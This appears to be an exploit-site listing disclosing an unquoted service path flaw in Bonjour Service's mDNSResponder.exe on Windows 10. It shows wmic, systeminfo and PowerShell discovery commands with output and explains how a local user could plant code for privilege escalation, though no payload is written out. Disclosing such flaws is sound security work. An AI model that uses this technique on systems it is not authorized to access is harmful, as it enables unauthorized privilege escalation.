Exploit for Bonjour Service 3,0,0,10 Unquoted Service Path

Name: Exploit for Bonjour Service 3,0,0,10 Unquoted Service Path
Rating: 5 (235 reviews)

2024-07-17 | CVSS 7.4

## https://sploitus.com/exploit?id=PACKETSTORM:179554
# Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service Path  
# Discovery by: bios  
# Discovery Date: 2024-15-07  
# Vendor Homepage: https://developer.apple.com/bonjour/  
# Tested Version: 3,0,0,10  
# Vulnerability Type: Unquoted Service Path  
# Tested on OS: Microsoft Windows 10 Home  
  
# Step to discover Unquoted Service Path:  
  
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"  
|findstr /i /v "c:\windows\\" |findstr /i /v """  
Bonjour Service  
Bonjour Service  
C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe  
Auto  
  
C:\>systeminfo  
  
Host Name: DESKTOP-HFBJOBG  
OS Name: Microsoft Windows 10 Home  
OS Version: 10.0.19045 N/A Build 19045  
  
PS C:\Program Files\Blizzard\Bonjour Service> powershell -command  
"(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion"  
>>  
3,0,0,10  
  
#Exploit:  
  
There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe) .  
This may allow an authorized local user to insert arbitrary code into the  
unquoted service path and escalate privileges.